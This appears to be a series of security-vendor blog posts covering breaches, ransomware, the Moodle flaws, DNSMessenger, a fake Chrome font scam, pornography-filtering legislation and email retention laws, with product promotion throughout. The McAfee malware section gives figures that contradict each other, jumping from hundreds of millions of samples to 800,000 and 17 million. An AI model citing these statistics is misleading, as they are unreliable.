However, cybersecurity awareness was much worse for all other areas tested by the survey. Just over half of respondents were able to correctly identify what a phishing attack involved, which is a particularly worrying result considering how widespread the use of phishing is.
Ransomware has been heavily reported in the press and attacks on businesses have soared, yet fewer than half of survey participants were able to correctly identify what ransomware is and only 46% knew that email was not encrypted by default.
Worryingly, only 33% of participants were aware that HTTPS meant traffic was encrypted, suggesting many are entering credit card information into unencrypted websites.
Only one in ten participants were able to correctly identify multi-factor authentication, with 71% thinking CAPTCHA was a form of multi-factor authentication rather than just a method of differentiating between a human web visitor and a bot.
The survey showed cybersecurity awareness improved with the level of education in all areas tested by the study. Younger participants (18-29) were also more likely to answer questions correctly than the older age groups.
The share of incorrect answers was relatively low, with many opting to answer the questions with ‘not sure.’ While the survey does not show that cybersecurity awareness is woefully inadequate, it does clearly indicate that when it comes to cybersecurity awareness, there is considerable room for improvement.
While it is the responsibility of every individual to ensure they are aware of the risks when venturing online and should take steps to protect their identities and bank accounts, the survey confirms what many IT security professionals know all too well. Employee cybersecurity awareness is poor and the risk of employees making mistakes that compromise the security of their organization is high.
Cybersecurity training programs clearly need to be improved to raise awareness of the main threats and drill in best practices. However, it is essential that robust defenses are implemented to ensure that business networks are protected from poor security decisions made by employees.
If you would like to find out more about the best cybersecurity solutions that you can implement to keep your business protected from your own employees and how you can reduce reliance on your staff making the right security choices, contact the TitanHQ team today.
Security researcher Chris Vickery has discovered a Schoolzilla AWS misconfiguration that resulted in the records of 1.3 million students being accidentally left unprotected.
Schoolzilla is a student warehouse platform used by K12 schools to track and analyze student data. While data on the platform were protected and access by unauthorized individuals was not possible, that was not the case for a backup file on the platform.
Vickery had been conducting scans to identify unprotected Amazon Web Services installations when he noticed a number of unsecured buckets on the Tableau data visualization platform. Further investigation revealed an unprotected ‘sz tableau’ bucket named sz-backups, which was a data repository for backups of the Schoolzilla database.
The Amazon S3 bucket had been accidentally configured to allow public access, leaving 1.3 million student records exposed. The records contained sensitive information such as the names and addresses of students, along with test scores, grades, birthdates and some Social Security numbers.
Vickery notified Schoolzilla of the error and the company worked quickly to secure the backups. Schoolzilla has now implemented a number of additional technical safeguards to ensure all student data is protected and all affected schools have been contacted and notified of the data exposure. It is unclear exactly how many schools were affected.
The Schoolzilla AWS misconfiguration shows just how easy it is for sensitive data to be exposed online. This time it was a security researcher that discovered the exposed data, but cybercriminals are also performing scans for unprotected data. In this case, Schoolzilla was able to confirm that no unauthorized individuals had accessed the file except Vickery. Other companies may not be so fortunate.
Schools and other educational institutions are increasingly using AWS and other cloud storage platforms to house student data. Data can be securely stored in the cloud; however, human error can all too easily result in sensitive data being exposed.
The incident highlights just how important it is for organizations to conduct security scans and perform penetration tests to ensure that vulnerabilities and errors are rapidly discovered and corrected.
The Human Trafficking and Child Exploitation Prevention Act is a bill that will make it harder for individuals to access pornography on Internet-enabled devices by making manufacturers and retailers of those devices implement a pornography filtering solution by default.
Support for the bill is growing, with 12 states having already backed the bill – Alabama, Florida, Georgia, Indiana, Louisiana, New Jersey, North Dakota, Oklahoma, South Carolina, Texas, West Virginia, and Wyoming – and many others are considering implementing similar legislation.
While many states have been opposed to introducing legislation that prevents pornography from being accessed, support for the bill has been growing due to the change in how pornography is being portrayed. Rather than being viewed as a moral issue that must be tackled, pornography is now being viewed as a public health crisis. Proponents of the Human Trafficking and Child Exploitation Prevention Act claim viewing pornography is bad for mental health, sexual health, as well as causing damage to relationships. It has been claimed that the availability of pornography is also contributing to the growth of human trafficking for the sex trade.
The legislation requires all manufacturers and retailers who make or sell Internet-enabled devices to be required by law to implement a web filtering solution on those devices to block pornography, prostitution hubs, child pornography, obscenity, and revenge pornography on those devices by default.
The law will not make it illegal for individuals over the age of 18 to view Internet pornography and other obscene content, but in order to do so they will be required to provide the retailer – or manufacturer – with proof of age. Similar laws are already in place requiring retail stores to prevent minors from being able to view pornographic magazines unless they first provide proof of age.
The legislation is the most workable solution to restrict access to pornography. It would not be feasible to require websites to conduct age checks, as there would be no jurisdiction over website owners based outside the United States. Pornography filtering legislation is viewed as the least restrictive method of controlling who can access pornography.
The Human Trafficking and Child Exploitation Prevention Act will not prohibit individuals from viewing pornography if they wish to do so. However, exercising their right to access obscene content will come at a cost. In addition to providing proof of age, consumers will be required to pay a one off fee of $20 to have the pornography filter lifted. The money collected will go to the state in which the individual resides, and those funds will be directed to a number of groups that are tackling the problem of human trafficking and sexual violence.
Individuals may have to pay further costs to access pornography as retailers and manufacturers will be permitted to charge individuals a fee on top of the $20 state fee for unlocking the pornography filter.
It is possible that the filtering solution used by manufacturers and retailers may not get the balance right 100% of the time. There are likely to be many cases of over-blocking or under-blocking of obscene content. Therefore, the Human Trafficking and Child Exploitation Prevention Act requires a mechanism to be put in place that allows individuals to submit requests to have websites and webpages added to the filter if they contain obscene content and have not been blocked. Similarly, if websites containing acceptable content are incorrectly blocked by the filter, it must be possible for individuals to request that the block be lifted. A call center or website must be made available for this purpose.
Manufacturers/retailers will be required to process requests in a reasonable timeframe. If they fail to do so they will be liable for fines.
McAfee has issued a new threat report detailing 2016 malware trends. The decline in new malware samples in the final quarter of 2016 does not suggest that 2017 will see a continued fall in new malware, but the opposite, according to McAfee Labs.
2016 malware trends follow a similar pattern to 2015. The first quarter saw large volumes of new malware discovered, followed by a steady decline over the next three quarters. The same trend was identified in 2015. Far from that decline continuing into 2017, the first quarter figures – which will not be made available until the summer – are likely to follow a similar trend and involve a massive in malware numbers in the first three months of 2017.
Further, there has been a steady increase in the number of new malware samples detected year on year, from around 400 million per quarter in 2015 to more than 600 million per quarter in 2016. If that trend continues into 2017, this year is likely to see around 800,000 new malware samples detected each quarter on average. McAfee predicts that there will be around 17 million malware samples by the end of this year.
McAfee reports that ransomware has increased steadily over the course of 2016, starting the year with around 6 million samples and finishing the year with over 9 million detected samples. However, the final quarter of 2016 saw a sharp drop in ransomware due to a decline in generic ransomware detections and a fall in the use of Locky.
There have been relatively few new Mac OS malware samples detected over the past two years, although Q3, 2016 saw new Mac OS malware increase from around 10,000 to 50,000, with a massive rise to around 320,000 new samples in the final quarter of 2016.
By the end of 2016, the total number of Mac OS malware rose to more than 450,000, from around 50,000 at the end of Q4, 2015. The increase mostly involved bundled adware.
The switch from exploit kits to email as the main attack vector is evident from the figures for new macro malware, with a sharp rise in Q2, 2016 and a continued rise in Q3. In Q1, there were around 60,000 detections, in Q3 that figure had risen to more than 200,000.
The public sector was most affected by security breaches in 2016, followed by healthcare, online services, finance, and software development. The biggest causes of security incidents, for which the causes are known, were account hijacking, followed by DDoS attacks, targeted attacks, SQL injection and malware. The main methods used for conducting network attacks last year were SSL (33%), DoS (15%), Worms (13%), brute force attacks (13%), and browser-based attacks (15%).
There has been a downward trend in new suspect URLS detected from Q1 2015 to Q2, 2016, although that trend has reversed in the last two quarters of 2016 with new malicious URL detections starting to rise steadily. New phishing URLS ebb and flow, although there was a general upward trend in 2016. McAfee’s figures shows spam email volume has remained fairly constant for the past two years, with the bulk of spam messages delivered using the Necurs botnet in Q3 and Q4, 2016.
A recent insider threat intelligence report from Dtex has revealed the vast majority of firms have employees bypassing security controls put in place to limit Internet activity. Those controls may simply be policies that prohibit employees from accessing certain websites during working hours, or in some cases, Internet filtering controls such as web filtering solutions.
Dtex discovered during its risk assessments on organizations that 95% of companies had employees that were using virtual private networks (VPNs) to access the Internet anonymously, with many installing the TOR browser or researching ways to bypass security controls online. The researchers discovered that in some cases, employees were going as far as installing vulnerability testing tools to bypass security controls.
Why Are Employees Bypassing Security Controls?
Employees bypassing security controls is a major problem, but why is it happening?
The report indicates 60% of attacks involve insiders, with 22% of those attacks malicious in nature. During the first week of employment and the final week before an employee leaves, there is the greatest chance of data theft. 56% of organizations said they had discovered potential data theft during those two weeks. During these times there is the greatest risk of employees attempting to bypass security controls for malicious reasons.
In many cases, VPNs and anonymizers are used to allow employees to access websites without being tracked. Many companies have policies in place that prohibit employees from accessing pornography in the workplace. Similar policies may cover gaming and gambling websites and other categories of website that serve no work purpose. Some employees choose to ignore those rules and use anonymizers to prevent their organization from having any visibility into their online activities.
The report indicates 59% or organizations had discovered employees were accessing pornographic websites at work. There are many reasons why companies prohibit the accessing of pornography at work. It is a drain of productivity, it can lead to the development of a hostile working environment, and from a security standpoint, it is a high-risk activity. Pornographic websites are often targeted by cybercriminals and used to host malware. Visiting those sites increases the risk of silent malware downloads. 43% of companies said they had found out some employees had been using gambling sites at work, another high-risk category of website and a major drain of productivity.
While employees are provided with email accounts, many are choosing to access web-based accounts such as Gmail. Dtex found that 87% of employees were using web-based email programs on work computers. Not only does this present a security risk by increasing the probability of malware being downloaded, it makes it harder for employers to identify data theft. Dtex says “By completely removing data and activity from the control of corporate security teams, insiders are giving attackers direct access to corporate assets.”
Lack of Control and Visibility
Many companies are unaware that they have employees bypassing security controls because they lack visibility into what is happening on end points. Shadow IT can be installed without the organization’s knowledge, including VPN’s and hacking tools, but what can be done to stop employees bypassing security controls?
Security software can be installed to allow organizations to closely monitor the types of activities that are taking place on work computers. This can allow action to be taken to reduce insider threats. Organizations should also block the use of VPN’s and anonymizers to ensure they have more visibility into employee’s online activities.
One of the easiest ways to block the use of VPNs and anonymizers is to use a web filtering solution. Web filters are increasingly used as a way of preventing productivity losses during the working day. Web filtering solutions can be configured to block specific sites or categories of website.
A web filter, such as WebTitan, can be configured to block access to anonymizer websites, along with other websites that are prohibited under organization’s acceptable use policies.
Some employees find the controls overly restrictive and search for ways to bypass those controls. Organizations should carefully consider what websites and types of websites are blocked. Excessively restrictive controls over personal Internet access can prompt employees to try to bypass security controls. Allowing some personal use may be preferable.
One solution, possible with WebTitan, is to ease restrictions on Internet access by using time controls. To prevent falls in productivity, web filters can be applied during working hours, yet relaxed at other times such as lunch breaks. By allowing some personal Internet use, there is less incentive for employees to attempt to bypass security controls.
WebTitan also produces access logs to allow organizations to carefully monitor online user activity and take action against the individuals discovered to be violating company policies. Automatic reports can also be generated to allow organizations to take more timely action.
Monitoring employee Internet access and installing solutions to provide visibility into end point activity allows organizations to reduce the risk of insider threats and stop employees from engaging in risky behavior.
Bitdefender has developed a free Bart ransomware decryptor that allows victims to unlock their files without paying a ransom.
Bart Ransomware was first detected in June 2016. The ransomware variant stood out from the many others due to its ability to encrypt files even without an Internet connection. Most ransomware variants rely on a connection to their command and control server to generate public-private key pairs; however, Bart ransomware does not. Only the decryption process requires an Internet connection to transfer the ransom payment and receive the decryption key.
Bart ransomware posed a significant threat to corporate users. Command and control center communications could potentially be blocked by firewalls preventing encryption of files. However, without any C&C contact, corporate users were at risk.
Bart ransomware was believed to have been developed by the gang behind Locky and the Dridex banking Trojan. Bart ransomware shared a significant portion of code with Locky, was distributed in the same manner and used a ransom message very similar to that used by Locky.
As with Locky, Bart ransomware encrypted a wide range of file types. While early versions of the ransomware variant were fairly unsophisticated, later versions saw flaws corrected. Early versions of the ransomware variant blocked access to files by locking them in password-protected zip files.
The initial method of locking files was ‘cracked’ by AVG, although only by guessing the password using brute force methods. In order for the brute force method to work, a copy of an encrypted file along with its unencrypted original was required. In later versions of the ransomware, the use of zip files was dropped and AVG’s decryption technique was rendered ineffective. The encryption process used in the later versions was much stronger and the ransomware had no known flaws.
Until Bitdefender developed the latest Bart Ransomware decryptor, victims had two choices – recover encrypted files from backups or pay the attackers’ ransom demand.
Fortunately, Bitdefender was able to create a Bart Ransomware decryptor from keys supplied by Romanian police which were obtained during a criminal investigation. The Bart ransomware decryptor was developed by Bitdefender after collaborating with both the Romanian police and Europol.
From April 4, 2017, the Bart ransomware decryptor has been made available for free download from the No More Ransom website. If your files have been encrypted by ransomware, it is possible to tell if the culprit is Bart from the extension added to encrypted files. Bart uses the .bart, .perl, or bart.zip extensions.
Bart ransomware may be believed to have links to Locky, although there is no indication that keys have been obtained that will allow a Locky ransomware decryptor to be developed. The best form of defense against attacks is blocking spam emails to prevent infection and ensuring backups of all sensitive data have been made.
The FBI has issued a cybersecurity warning for healthcare providers on the use of FTP servers. FTP servers should have authentication controls in place to ensure only authorized individuals can access stored data. However, when FTP servers are in anonymous mode, access can be gained with a generic username and password. In some cases, access is possible without a password.
The usernames that provide access could be as simple as ‘FTP’ or ‘anonymous’ and lists of usernames can be easily found on the Internet. Cycling through a short list of possible usernames is likely to take seconds or minutes at the most and access to stored data can be gained without any hacking skills. Data stored on an anonymous FTP server could be accessed by anyone.
The FBI cybersecurity warning for healthcare providers cites research conducted by the University of Michigan in 2015 that shows the scale of the problem. The study revealed there are more than one million FTP servers in use around the world that allow anonymous access. Any data stored on those servers could be freely accessed by the public. Should those FTP servers contain sensitive data such as protected health information, it could easily be stolen and used for malicious purposes.
Firewalls and other perimeter defenses serve to protect networks and EHRs from cyberattacks, yet FTP servers could be a gaping hole in an organization’s defenses. Many healthcare providers use FTP servers to allow data to be easily shared with business associates and other healthcare entities. Yet, if authentication controls are not used they are a data breach waiting to happen.
The FBI has warned all medical and dental organizations to ensure that no sensitive data are stored on anonymous FTP servers and advises healthcare organizations to check if their servers are running in anonymous mode. Smaller organizations without the resources of large healthcare systems are more likely to have overlooked this vulnerability; although checks should be performed by all healthcare organizations.
The cybersecurity warning for healthcare providers explains the risks extend beyond the theft of sensitive data. If access to the servers can be gained, FTP servers could be used to store illegal material. Healthcare organizations may have cybersecurity solutions in place to monitor for data being exfiltrated, but not data that are being uploaded. Hacking tools could be uploaded to the servers or they could be used to share illegal content.
If FTP servers must be run in anonymous mode, healthcare organizations should ensure the servers only contain data that is publicly available.
Educational institutions have been warned about Moodle security flaws that could allow cybercriminals to attack web servers, gain administrative privileges and run malicious code.
Many educational institutions use the Moodle platform for their e-learning websites. The platform allows students to access interactive online courses. There are almost 80,000 websites that use the open source platform, many of which are operated by schools, colleges and universities.
On Monday this week, Security researcher Netanel Rubin discovered a vulnerability – tracked as CVE-2017-2641 – that could be exploited to run malicious PHP code on an unpatched Moodle server. He pointed out on his blog that the problem does not lie with a single critical security flaw, but a number of smaller vulnerabilities which can be exploited when combined.
An attacker could exploit the Moodle security flaws and create hidden administrative accounts; however, in order to exploit the flaws, it would be necessary for the attacker to have an account on the platform. It does not matter what type of account the attacker has, provided it is not a guest account. Since more than 100 million individuals log onto the websites to access courses, obtaining a user account would not pose too much of a problem.
The Moodle security flaws could be exploited by attackers to install backdoors in the system allowing persistent access to data stored on a Moodle server, and there is data aplenty. Highly sensitive information about students is stored on the system, including personal information, grades and test data.
According to Rubin, the Moodle security flaws affect all versions of the platform tested, including “3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions.”
Rubin pointed out that such a large system – Moodle contains more than 2 million lines of PHP code – will almost inevitably have numerous vulnerabilities. In this case, the code has been written by multiple authors which has led to logical flaws being introduced. The problem comes from having too much code, too many developers and a lack of documentation. That is a problem for any system of this size, not just Moodle.
Rubin was able to take advantage of the Moodle security flaws and gain administrative privileges on the server, after which it was child’s play to execute code. Rubin said it was as simple as uploading a new plugin to the server.
Last week Moodle released a patch to address a number of vulnerabilities in the system, although no information was released about what the patch addressed. All users of the system are advised to update to the latest version of the platform and apply the latest security patch as soon as possible.
Failure to update systems and apply patches promptly will leave systems vulnerable to attack, whether it is Moodle or any other platform or software. If patches are not applied it will only be a matter of time before security flaws are exploited to gain access to servers or computers and steal sensitive data.
2017 has already seen numerous cyberattacks on educational institutions. 2017 has started particularly badly for the education sector and there is no sign of the cyberattacks abating any time soon. But why is the education sector being so heavily targeted by hackers, cybercriminals, and scammers?
It is easy to see why cyberattacks on financial institutions occur. There are substantial funds to be plundered. Cyberattacks on healthcare organizations are also common. Those organizations hold vast quantities of data; data that can be sold for big bucks on the black market and used for all manner of fraud: Medical fraud, identity theft, tax fraud, and insurance fraud for example.
However, the education sector is similarly being targeted. K12 schools, colleges, and universities have all been attacked and those attacks have soared in 2017.
The list of educational institutions that have reported cyberattacks in 2017 is long. Barely a day goes by without another educational institution being added to the list. Many of the cyberattacks on educational institutions are random, but it is becoming increasingly clear that the education sector is being targeted.
There are many reasons why the attacks have soared in recent months. Educational institutions hold vast quantities of valuable data, they have considerable computer resources that can be used by cybercriminals, and in contrast to other industry sectors, educational institutions are not as heavily regulated when it comes to cybersecurity protections. Defenses are relatively poor and educational organizations tend to have relatively few IT staff compared to the corporate sector.
In short, the potential profits from cyberattacks on educational institutions are high and attacks are relatively easy to perform. For cybercriminals that is an excellent combination.
What Data are Cybercriminals Attempting to Steal?
K12 school systems have been targeted by criminals in order to gain access to student data. Social Security numbers of minors are extremely valuable. Dates of birth and Social Security numbers can be used for identity theft and fraud and in the case of minors, fraud is less likely to be identified quickly. Minors details can be used for longer.
Universities and school systems also hold considerable amounts of intellectual property and research. That information can be sold for considerable sums on the black market.
As we have seen on many occasions this year, the personal information of school employees has been targeted by scammers. Emails have been sent requesting W-2 Form data, which are used to file fraudulent tax returns in school employees’ names.
This tax season, the following colleges, universities, schools and school districts have reported that employees have fallen for a W-2 Form phishing scam and have emailed the data of their employees to cybercriminals.
- Abernathy Independent School District
- Ark City School District
- Ashland University
- Barron Area School District
- Belton Independent School District
- Black River Falls School District
- Bloomington Public Schools
- College of Southern Idaho
- Corsicana Independent School District
- Crotched Mountain Foundation
- Davidson County Schools
- Dracut Schools
- Glastonbury Public Schools
- Groton Public Schools
- Independent School District
- Lexington School District Two
- Manatee County School District
- Mohave Community College
- Morton School District
- Mount Healthy City Schools
- Northwestern College
- Odessa School District
- Redmond School District
- Tipton County Schools
- Trenton R-9 School District
- Tyler Independent School District
- Virginian Wesleyan College
- Yukon Public Schools
As with the healthcare industry, the reliance on data makes schools, colleges, and universities targets for ransomware attacks. Ransomware is used to encrypt data and a ransomware demand is issued to unlock files. In many cases ransoms are paid as no backups of the encrypted data exist.
Some notable cyberattacks on educational institutions that have been reported this year are listed below.
2017 Cyberattacks on Educational Institutions
Northside Independent School District in San Antonio, TX, discovered its email system had been hacked. Names, addresses, and dates of birth were potentially stolen. In total, 23,000 individuals were impacted by the incident.
South Washington County Schools in Minnesota discovered that one of its students had hacked into its system and stolen more than 15,000 employee records.
Los Angeles County College was attacked with ransomware in January and was forced to pay a ransom demand of $28,000 to regain access to its files. The attack resulted in most of the college’s infrastructure, including email and voicemail, being encrypted by the ransomware.
Horry County Schools in South Carolina was forced to pay a ransom demand of $8,500 to recover data that were encrypted with ransomware. Even though the ransom was paid, systems were taken out of action for over a week as a result of the infection.
These are just a handful of the cyberattacks on educational institutions reported this year. Given the increase in cyberattacks on educational institutions, it is essential that schools, colleges, and universities take action and implement appropriate defences to mitigate risk.
If you are in charge of cybersecurity at your educational organization and you would like to receive tailored advice on some of the best protection measures you can implement to reduce the risk of a cyberattack, contact the TitanHQ team today.
At a recent cybersecurity conference, Director of the FBI, James B. Comey, has given valuable ransomware advice for healthcare providers to help them tackle the growing threat of attack. Comey confirmed that ransomware is now the biggest cybersecurity threat for the healthcare industry. Healthcare providers must be prepared for an attack and be able to respond quickly to limit the harm caused.
Ransomware is used to encrypt files and databases to prevent the victim from accessing essential data. Since healthcare providers need access to patient health information in order to provide medical services, healthcare providers are being extensively targeted. If data access is essential, victims are more likely to pay ransom demands.
However, Comey explained that ransoms should never be paid. If a ransom is paid, this only encourages cybercriminals to attack more businesses. The payment of a ransom sends a message to other cybercriminals that the attacks are profitable.
Ransomware can be sent randomly via spam email or distributed by malicious websites. Cybercriminals also install ransomware once access to a computer system has been gained and data have been exfiltrated. Tackling the problem involves implementing a range of cybersecurity defenses to prevent attacks and ensuring data can be recovered and business processes can continue if ransomware is installed.
In the case of the latter, data backups are essential. All critical data should be backed up on a daily basis at a minimum. Data backups can also be encrypted by ransomware, so it is essential that backup devices are not left connected to computers or servers. Data should ideally also be backed up in the cloud.
One of the best pieces of ransomware advice for healthcare providers is to prepare for an attack now. Healthcare organizations should not wait until a ransomware infection occurs to decide how to respond. Not only should policies be developed that can be implemented immediately following a ransomware attack, business continuity plans must be tested prior to a disaster occurring. The same goes for backups. Many organizations have been attacked with ransomware only to discover that they have been unable to restore their data due to a corrupted backup file.
At the conference, there were many security professionals offering ransomware advice for healthcare providers, although when it comes to prevention there is no silver bullet. A range of ransomware defenses should be deployed to prevent email and web-borne attacks.
Cybersecurity solutions should be implemented to prevent malicious emails from being delivered to end users. Spam filtering solutions are one of the best defenses against email-borne threats as they block the majority of malicious emails from being delivered to end users. Cybersecurity solutions should also be implemented to prevent web-borne attacks. Web filters block malicious websites from being visited and can be configured to prevent downloads of malicious and suspicious files. Endpoint security solutions should also be considered. They can rapidly detect downloads of malicious files and prevent malicious software from being installed.
Employees must also be informed of the risk of attack and trained to be more cyber aware. Training should be reinforced with exercises to test whether cybersecurity training has been effective. Individuals can then be singled out and provided with further training as necessary.
Comey explained to attendees at the Boston Conference on Cybersecurity that the key to combating cybercrime is collaboration. Cybercrime has escalated in recent years and the problem is not going to be beaten by organizations acting independently. Collaboration between law enforcement organizations and companies across all industries is essential. Comey said all new cyberthreats and details of cyberattacks should be shared with the FBI.
A new fileless malware has been detected that uses DNS to receive commands and send information to the attackers’ command and control server. The stealthy communication method together with the lack of files written to the hard drive makes this new malware threat almost impossible to spot.
The attack method, termed DNSMessenger, starts with a phishing email, as is the case with many of the new malware threats now being detected. The host is infected via a malicious Word document.
Opening the Word document will display a message informing the user that the document has been protected using McAfee Secure. The user is required to enable content to view the document; however, doing so will call a VBA function that defines the Powershell command and includes the malicious code. As is the case with other forms of fileless malware, since no files are written to the hard drive during the infection process, the threat is difficult to detect.
Fileless malware are nothing new, in fact they are becoming increasingly common. What makes this threat unique is the method of communication it uses. The malware is able to receive commands via the DNS – which is usually used to look up Internet Protocol addresses associated with domain names. The malware sends and received information using DNS TXT queries and responses.
DNS TXT records are commonly used as part of the controls organizations have in place to identify phishing emails and verify the sender of a message – Sender Policy Framework (SPF) and Domain Message Authentication Reporting and Conformance (DMARC).
The attackers can send commands to the malware via DNS TXT queries and the malware can send the attackers the output of the commands via the same channel. Even if an organization has blocked outbound DNS for unapproved servers, the malware will still be able to communicate with the attackers C2 infrastructure.
While many organizations inspect the contents of web traffic, relatively few inspect the content of DNS requests. The malware is therefore likely to operate unnoticed. Further, the Cisco Talos team that detected the malware reports that only 6/54 AV engines detected the threat, although ClamAV did identify the file as malicious.
Cybercriminals are constantly looking for new methods of bypassing security controls and infecting end users. However, since this threat is delivered via email, that is the point at which it is easiest to block. Infection also requires macros to be enabled. If macros are blocked, the malware will not be executed. Otherwise, since the DNS communications between the malware and the attackers differs from standard DNS communications, inspecting DNS content should enable security professionals to identify infection.
Opposition to pornography filtering in libraries has seen the American Library Association placed on the National Center for Sexual Exploitation (NCOSE) naughty list.
Each year, NCOSE publishes a list of the top twelve companies and organizations that it believes are either profiting from pornography or facilitating access. The aim of the list, referred to as the Dirty Dozen, is to name and shame the companies and organizations that are failing to do enough to tackle the growing problem of online pornography.
Pornography is only the tip of the iceberg. Hidden underneath is a world of sexual exploitation, prostitution, and sex trafficking. NCOSE sees companies and organizations that fail to take action as being part of the problem, inadvertently – or in some cases deliberately – contributing to the considerable harm that is caused by pornography.
This year’s list includes technology and telecoms companies (Amazon, Comcast, Roku) the American Library Association (ALA) and EBSCO, a provider of library resources to schools, colleges, higher education establishments and libraries). Four websites make the list (YouTube, Twitter, Snapchat, and Backpage.com), along with Cosmopolitan Magazine, HBO, and Amnesty International.
The ALA is almost a permanent fixture on the NCOSE Dirty Dozen list, having been present for the past five years. It is the ALA’s opposition to the use of pornography filtering in libraries that sees it included year after year. NCOSE says “the ALA zealously encourages public libraries not to install internet filters on public access computers.” By taking such a stance, the ALA is providing patrons – including children – with the means to access sexually explicit and obscene material. ALA told CBN news that “Librarians encourage parents and children to talk with one another. Families have a right to set their own boundaries and values. They do not have the right to impose them on others.”
NCOSE doesn’t hold back, saying the ALA stance on pornography filtering in libraries “has turned the once safe community setting of the public library into a XXX space that fosters child sexual abuse, sexual assault, exhibitionism, stalking, and lewd behavior in libraries across the country.”
Only this month, NCOSE responded to the ALA’s continued opposition to pornography filtering in libraries on the grounds of free speech, saying there is no constitutional requirement for libraries to provide access to hardcore pornography to patrons.
EBSCO made the list as its databases “provide easy access to hardcore pornography sites and extremely graphic sexual content,” pointing out that its system allows schoolchildren to easily circumvent web filters in schools. In response to its inclusion on the list, EBSCO says it is working on enhancing its web filtering systems and will implement better algorithms to filter pornographic content.
Amazon made the list, even though it has a policy prohibiting the sale of pornography, because of its pornography-related items on its site, including hardcore pornographic films and sex dolls with childlike features.
Amnesty International made the list for its stance on the decriminalization of prostitution and for creating “a de facto right for men to buy people.” Cosmopolitan was included for its hypersexualized imagery and glamorization of violent, public, and group sex. Roku, Comcast, Snapchat, Twitter, YouTube and HBO were included for peddling pornography, pushing the boundaries of what is acceptable, and making it too easy for pornographic content to be accessed.
A security researcher has discovered a new Google Chrome scam that infects victims’ computers with malware. In contrast to many malware-downloading scams, the new Google Chrome scam is highly convincing and is certain to result in many malware infections.
A popup appears on screen informing the visitor that “the “HoeflerText” font wasn’t found” by Google Chrome. The visitor is told that the webpage they are trying to view cannot be displayed correctly as a result. Visitors are prompted to update their Chrome browser to include the new font by downloading a “Chrome Font Pack.”
The Google Chrome scam is convincing. The popup uses the Chrome logo and looks official, with colors and branding that Google would use on its popup windows. The shading used for the “Update” button on the popup window is also accurately reproduced.
Furthermore, HoeflerText is a true font. If the user opens a new tab on their browser and Google’s the font, they will discover the font is real, making the Google Chrome scam seem entirely plausible.
Clicking the update button will trigger a download of the update file – ChromeFontv7.5.1.exe – which is an executable containing the malware. While attempting to run the executable would normally result in an anti-virus warning being displayed, relatively few anti-virus products are detecting the ChromeFontv7.5.1.exe file as malicious. VirusTotal shows that just 9 out of 59 AV products identify the file as malicious.
The Google Chrome scam was uncovered by NeoSmart Technologies researcher Mahmoud Al-Qudsi. He reports that while the Google Chrome scam is highly convincing, there are two signs that the update is not real. First, regardless of the version of Chrome used, the popup says the user has Chrome version 53. The second sign of the scam is the popup says the update file is called Chrome_Font.exe, yet the file that is downloaded has a different name. These two slipups by the criminals behind the campaign are only slight and would unlikely be noticed by many users.
WebTitan Protects Users from the Latest Google Chrome Scam
The malware is identified as malicious by ClamAV and Kaspersky Lab, the dual anti-virus engines used by WebTitan to protect users from malware infections while browsing the Internet. If WebTitan is installed, this and other malware threats are blocked, preventing end users from inadvertently infecting their computer with malware.
If you have yet to implement a web filtering solution, your computers and networks are likely to be at risk of being infected. Malware and ransomware infections are costly to resolve, cause considerable disruption to business processes, and can result in the theft of intellectual property, customer data, and login credentials. The latter can be used to gain access to corporate bank accounts, allowing funds to be transferred to criminals’ accounts.
Since visiting malicious websites can result in malware being silently downloaded without any user interaction, employees may be unaware that their computers have been infected. Malware infections may go undetected for long periods of time, during which large volumes of sensitive data can be stolen.
A web filtering solution will prevent employees from visiting malicious websites that phish for sensitive information or download malware. Furthermore, a web filtering solution is inexpensive to implement and maintain.
To discover the benefits of web filtering and to find out more about WebTitan, contact the TitanHQ team today. WebTitan is also available on a 30-day, no obligation free trial allowing you to discover the benefits of the full product before deciding to proceed with a purchase.
Email retention laws in the United States require businesses to keep copies of emails for many years. There are federal laws applying to all businesses and organizations, data retention laws for specific industries, and a swathe of email retention laws in the United States at the individual state level. Ensuring compliance with all the appropriate email retention laws in the United States is essential. Non-compliance can prove incredibly costly. Multi-million-dollar fines await any organization found to have breached federal, industry, or state regulations.
All electronic documents must be retained by U.S organizations, which extends to email, in case the information is required by the courts. eDiscovery requests often require large volumes of data to be provided for use in lawsuits and the failure to provide the data can land an organization in serious trouble. Not only are heavy fines issued, organizations can face criminal proceedings if certain data are deleted.
For decades, U.S organizations have been required to store documents. Document retention laws are included in numerous legislative acts such as the Civil Rights Act of 1964, the Executive Order 11246 of 1965, the Freedom of Information Act of 1967, the Occupational Safety and Health Act of 1970, and the Reform and Control Act of 1986 to name but a few; however, just over a decade ago, data retention laws in the United States were updated to expand the definition of documents to include electronic communications such as emails and email attachments.
To improve awareness of the many different email retention laws in the United States, a summary has been detailed below. Please bear in mind that this is for information purposes only and does not constitute legal advice. For legal advice on data retention laws in the United States, we recommend you consult your legal representatives. Industry and federal electronic data and email retention laws in the United States are also subject to change. Up to date information should be obtained from your legal team.
What are the Different Email Retention Laws in the United States?
As you can see from the list below, there are several federal and industry-specific email retention laws in the United States. These laws apply to emails received and sent, and include internal as well as external emails.
|Email retention law
||Who it applies to
||How long emails must be stored
|Freedom of Information Act (FOIA)
||Federal, state, and local agencies
|Sarbanes Oxley Act (SOX)
||All public companies
|Department of Defense (DOD) Regulations
|Federal Communications Commission (FCC) Regulations
|Federal Deposit Insurance Corporation (FDIC) Regulations
|Food and Drug Administration (FDA) Regulations
||Pharmaceutical firms, food manufacturers, food storage and distribution firms, manufacturers of biological products
||Minimum of 5 years rising to 35 years
||Banks and Financial Institutions
|Health Insurance Portability and Accountability Act (HIPAA)
||Healthcare organizations (Healthcare providers, health insurers, healthcare clearinghouses and business associates of covered entities)
|Payment Card Industry Data Security Standard (PCI DSS)
||Credit card companies and credit card processing organizations
|Securities and Exchange Commission (SEC) Regulations
||Investment banks, investment advisors, brokers, dealers, insurance agents & securities firms
||Minimum of 7 years up to a lifetime
Email retention laws in the United States that are applied by each of the 50 states are beyond the scope of this article. There area also European laws, such as the GDPR email requirements.
What is the Best Way to Store Old Emails?
Storing emails for a few years is not likely to require masses of storage for a small business with a couple of members of staff. However, the more employees an organization has, the greater the need for extensive resources just to store emails. The average size of a business email may only be 10KB, but multiply that by 123 – the average number of emails sent and received each day by an average business user in 2016 (Radicati email statistics report 2015-2019), and by 365 days in each year, and by the number of years that those emails need to be stored, and the storage requirements become considerable.
